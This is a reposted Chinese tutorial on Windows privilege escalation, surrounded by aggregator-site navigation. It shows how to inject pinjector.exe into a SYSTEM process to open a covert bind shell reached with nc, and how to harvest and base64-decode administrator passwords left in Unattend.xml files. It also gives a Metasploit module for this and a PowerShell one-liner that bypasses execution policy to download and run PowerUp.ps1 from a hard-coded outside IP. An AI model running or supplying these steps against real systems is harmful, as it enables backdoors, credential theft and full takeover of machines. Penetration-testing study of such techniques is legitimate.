IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 开发工具 -> Windows提权—进程注入、Unattended Installs提权 -> 正文阅读

[开发工具]Windows提权—进程注入、Unattended Installs提权

进程注入提权

使用 pinjector.exe 注入到system用户的进程中,使该进程绑定在0.0.0.0:port ,并建立监听端口,攻击者从攻击机上主动连接该地址,获取到系统的system权限
注入进程提权相当于开启了一个后门, 隐蔽性极高,不会创建新的进程,很难发现

下载pinjector.exe

https://www.tarasco.org/security/Process_Injector/index.html

上传 pinjector.exe到靶机可执行目录

##列取所有进程
pinjector.exe -l

在这里插入图片描述

##选择一个system权限运行的进程,对此pid进程执行注入,并建立侦听端口
pinjector.exe -p <pid> cmd <port>

在这里插入图片描述

##使用 nc 连接目标服务器端口
nc -nv 192.168.0.117 5555

连接成功,获取到system权限的shell
在这里插入图片描述

Unattended Installs提权

通常大型组织在部署某些员工较多或时间紧缺的程序时,会使用Unattended Installs自动安装,这种方式允许程序在不需要管理员的操作下进行自动安装,这种方式在部署程序前期较有用,但它也会在系统中残留一个名为Unattend的XML文件,这个XML 件包含所有在安装程序过程中的配置,包括一些本地用户的配置,以及管理员账户等。

Unattend.xml 文件通常在以下文件夹中

C:\sysprep.inf

C:\syspreg\sysprep.xml

C:\Windows\system32\sysprep.inf

C:\windows\system32\sysprep\sysprep.xml

C:\unattend.xml

C:\Windows\Panther\Unattend.xml

C:\Windows\Panther\Unattended.xml

C:\Windows\Panther\Unattend\Unattended.xml

C:\Windows\Panther\Unattend\Unattend.xml

C:\Windows\System32\Sysprep\Unattend.xml

C:\Windows\System32\Sysprep\Panther\Unattend.xml

也可以使用命令全盘搜索Unattend文件

dir /b /s c:\unattend.xml

除此之外,系统中遗留的 sysprep.xmlsysprep.inf 文件中也可能包含部署系统时使用的凭证信息,可以通过利用这些信息进行提权。

通过搜索 UserAccounts 、Administrators、password 等对凭证进行定位
部分文件内容如下:

<UserAccounts> 
    <LocalAccounts> 
        <LocalAccount> 
            <Password> 
                <Value>UEBzc3dvcmQxMjMhUGFzc3dvcmQ=</Value>                         <PlainText>false</PlainText> 
            </Password> 
            <Description>Local Administrator</Description>                        <DisplayName>Administrator</DisplayName>                             <Group>Administrators</Group> 
            <Name>Administrator</Name> 
        </LocalAccount> 
    </LocalAccounts> 
</UserAccounts>

在以上文件中,可以看到 一个本地账户被创建并加入到了管理员组中。
可以猜测密码的值应该是以Base64进行编码的
对密码值进行Base64解码

UEBzc3dvcmQxMjMhUGFzc3dvcmQ=
##解码得到
P@ssword123!Password

通常微软会在编码前的密码后加上password,
所以这里本地管理员的密码实际上是:P@ssword123!

MSF中的利用模块
使用 post/windows/gather/enum_unattend 模块枚举连接的session中的Unattend

msf6 > use post/windows/gather/enum_unattend
msf6 > set session 1
msf6 >exploit

powershell 利用模块搜寻

powershell -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://120.79.66.58/mypowershell/PowerUp.ps1');Get-UnattendedInstallFile"

参考:
https://lengjibo.github.io/windows%E6%8F%90%E6%9D%83%E6%80%BB%E7%BB%93/
https://www.cnblogs.com/zpchcbd/p/12232683.html

  开发工具 最新文章
Postman接口测试之Mock快速入门
ASCII码空格替换查表_最全ASCII码对照表0-2
如何使用 ssh 建立 socks 代理
Typora配合PicGo阿里云图床配置
SoapUI、Jmeter、Postman三种接口测试工具的
github用相对路径显示图片_GitHub 中 readm
Windows编译g2o及其g2o viewer
解决jupyter notebook无法连接/ jupyter连接
Git恢复到之前版本
VScode常用快捷键
上一篇文章      下一篇文章      查看所有文章
加:2021-09-13 09:28:08  更:2021-09-13 09:29:17 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/23 5:07:11-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计